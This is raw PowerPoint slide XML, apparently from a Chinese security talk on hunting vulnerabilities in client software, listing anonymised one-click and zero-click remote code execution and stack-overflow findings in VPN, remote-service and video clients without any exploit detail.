                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>B-VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1/0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>C-VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>A-VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端栈溢出漏洞至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>B-VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端栈溢出漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1762424" y="3937834"/>
            <a:ext cx="1533525" cy="3994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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>生活类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1762424" y="4337248"/>
            <a:ext cx="3876376" cy="18658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 altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>远程服务平台客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>运维平台客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>视频软件客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>视频软件客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>1/0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Click RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="文本框 6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66" name="组 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5681330" y="1523174"/>
            <a:ext cx="1089088" cy="45719"/>
            <a:chOff x="3232298" y="1892595"/>
            <a:chExt cx="1089088" cy="53163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>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文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFA98F8-6B48-7CBE-0D7C-110007B873F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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议题介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8486A006-B454-F40F-C06B-92F49C838246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2638724" y="1831842"/>
            <a:ext cx="6936775" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>本议题所分享的挖掘思路，在实战过程中累计挖到十余枚安全漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37528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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="2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43" grpId="0"/>
      <p:bldP spid="44"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66565" y="2951946"/>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漏洞挖掘案例之常规风险篇</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5681330" y="3661198"/>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89407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常规风险：信息泄漏</a:t>
            </a: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2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73239021-17EF-9AA6-D263-ECB2EFD8B032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="630182" y="1821479"/>
            <a:ext cx="10906236" cy="4624583"/>
            <a:chOff x="358665" y="1782746"/>
            <a:chExt cx="11474669" cy="4847645"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C9F94E1-A5B7-8FF0-8873-FADA701B0B35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="358665" y="5466862"/>
              <a:ext cx="11474669" cy="824975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA589525-9C4F-76EA-FA74-7AC2CA3C4FB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="595202" y="1782746"/>
              <a:ext cx="11001594" cy="3301795"/>
              <a:chOff x="595203" y="3118381"/>
              <a:chExt cx="11001594" cy="3301795"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="14" name="组合 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0152BC38-1073-15F4-992B-ABA13D9206F5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="595203" y="3118381"/>
                <a:ext cx="11001594" cy="2941455"/>
                <a:chOff x="482651" y="2901405"/>
                <a:chExt cx="11001594" cy="2941455"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="图片 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1869BBAA-B651-CF22-56CF-68DF04CEBBB2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill rotWithShape="1">
                <a:blip r:embed="rId3"/>
                <a:srcRect r="23319"/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6993779" y="2901405"/>
                  <a:ext cx="4490466" cy="2941454"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="图片 17">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75118D89-29D9-E786-AED4-C19B419A16AB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="482651" y="2901406"/>
                  <a:ext cx="3020953" cy="2941454"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="图片 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6256D7D-F22F-1A29-A529-15D78328A359}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3740553" y="2901405"/>
                  <a:ext cx="3016277" cy="2941455"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="文本框 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D14843D-F12E-BCB4-775D-06F9AE8040CC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2029958" y="6081622"/>
                <a:ext cx="3321037" cy="338554"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
